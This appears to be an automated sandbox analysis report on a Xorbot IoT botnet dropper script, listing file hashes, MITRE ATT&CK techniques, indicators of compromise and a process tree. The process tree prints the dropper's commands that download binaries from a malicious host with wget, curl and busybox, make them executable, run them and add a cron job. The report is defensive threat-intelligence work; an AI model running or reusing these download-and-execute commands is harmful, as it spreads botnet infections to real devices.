xorbot | a00ecd09ba374aa021e7ccc7b33173caa6e382fc3b93ba03326ebedece23c58a

Analysis

max time kernel
96s
max time network
151s
platform
debian-9_mipsel
resource
debian9-mipsel-20240729-en
resource tags

arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
20-02-2025 18:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

7eb2de1ea7019f91b62df1a6d27a2ed7
SHA1

6483886dd87feaafa59fb05b3f68776770482456
SHA256

a00ecd09ba374aa021e7ccc7b33173caa6e382fc3b93ba03326ebedece23c58a
SHA512

14bdca8c1deebe4addffd12b4be8eaaaa13089b93591c2b4ef390c997c517b5bee340c8cdc2cab994c81f7a445d822fe3bafc785d4878d7da6c2744454ebb99b
SSDEEP

192:vmZgdKQvHUdxvn/s5NzSnsvHUdx3n/s5NGA:vugdKASDA

Score

10^/10

xorbot botnet defense_evasion discovery execution persistence privilege_escalation trojan

Malware Config

Signatures

Detects Xorbot 1 IoCs

botnet trojan

resource	yara_rule
behavioral4/files/fstream-6.dat	family_xorbot

Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
botnet trojan xorbot
Xorbot family
xorbot
Contacts a large (1260) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 2 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
793	chmod
914	chmod

Executes dropped EXE 2 IoCs

ioc	pid	Process
/tmp/2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo	794	bins.sh
/tmp/MOCJUczo8nGNpJfrIY0AcgPyu9i8Dikbly	916	bins.sh

Renames itself 1 IoCs

pid	Process
795	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalation

Cron

T1053.003

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.ESVq62	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/1027/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1030/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1065/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/18/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/72/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/829/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/933/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/938/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1036/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1021/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/71/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1004/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/13/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/819/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/864/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/922/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/969/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1000/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1035/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1054/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/858/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/889/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/75/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/77/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/812/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/836/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/872/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/967/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1039/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/816/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/874/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/959/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/993/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1055/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/331/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/12/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/719/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/839/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/944/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/952/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/979/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/834/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/842/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1034/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1053/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/896/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/955/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/966/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/996/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/434/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/703/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/885/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/890/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/904/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/709/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/880/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/903/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/930/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/970/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/971/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/976/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/filesystems	crontab

System Network Configuration Discovery 1 TTPs 7 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
818	wget
900	curl
903	busybox
921	wget
720	wget
748	curl
788	busybox

Writes file to tmp directory 3 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/MOCJUczo8nGNpJfrIY0AcgPyu9i8Dikbly	busybox
File opened for modification	/tmp/2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo	wget
File opened for modification	/tmp/2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo	curl

/tmp/bins.sh
/tmp/bins.sh
1⤵
- Executes dropped EXE
PID:713
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:717
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:720
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:748
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
  2⤵
  - System Network Configuration Discovery
  PID:788
- /bin/chmod
  chmod 777 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
  2⤵
  - File and Directory Permissions Modification
  PID:793
- /tmp/2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
  ./2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
  2⤵
  - Renames itself
  - Reads runtime system information
  PID:794
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:796
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:797
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:800
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      Reads runtime system information
      PID:801
- /bin/rm
  rm 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
  2⤵
  PID:813
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/MOCJUczo8nGNpJfrIY0AcgPyu9i8Dikbly
  2⤵
  - System Network Configuration Discovery
  PID:818
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/MOCJUczo8nGNpJfrIY0AcgPyu9i8Dikbly
  2⤵
  - System Network Configuration Discovery
  PID:900
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/MOCJUczo8nGNpJfrIY0AcgPyu9i8Dikbly
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:903
- /bin/chmod
  chmod 777 MOCJUczo8nGNpJfrIY0AcgPyu9i8Dikbly
  2⤵
  - File and Directory Permissions Modification
  PID:914
- /tmp/MOCJUczo8nGNpJfrIY0AcgPyu9i8Dikbly
  ./MOCJUczo8nGNpJfrIY0AcgPyu9i8Dikbly
  2⤵
  PID:916
- /bin/rm
  rm MOCJUczo8nGNpJfrIY0AcgPyu9i8Dikbly
  2⤵
  PID:919
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/YcomTvX4W8BssPdS8PdsReJtx3lxInKPUb
  2⤵
  - System Network Configuration Discovery
  PID:921

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo

Filesize
151KB

MD5
6c583043d91c55aa470c08c87058e917

SHA1
abf65a5b9bba69980278ad09356e53de8bb89439

SHA256
2d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948

SHA512
82ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5

Download Submit
/tmp/MOCJUczo8nGNpJfrIY0AcgPyu9i8Dikbly

Filesize
111KB

MD5
701e7a55a4f3650f5feee92a9860e5fc

SHA1
6ce4a7f0dc80fe557a0ace4de25e6305af221ed4

SHA256
ff851250b0bd7e6f2c445b08d858d840b554caf75a37ada2a970ea4d317ba588

SHA512
7352517b4af3b0cfe1cc814accf18e6254532f33dee274279bd499b6748aa0ed044c9429d6df0eb07ff0292cd0f9388ce44d278e0c562e6e57110b28a66a5f11

Download Submit
/var/spool/cron/crontabs/tmp.ESVq62

Filesize
210B

MD5
6c717d05cbf8567147e35246437ee3fb

SHA1
e54e77ebbba5e96674516ca742f5651d00b43d2c

SHA256
1635c93e21ef8f6e9c0868e23271fd5bb883a88e3033a4411feff53c08d9e258

SHA512
56f3ee805146a9d2262cdfce70c9f6502b9e797d622614d0925df21417498f11cd287a8d6156dda99da793246bc7b097983a501cc485c549cac51209c2441f1c

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads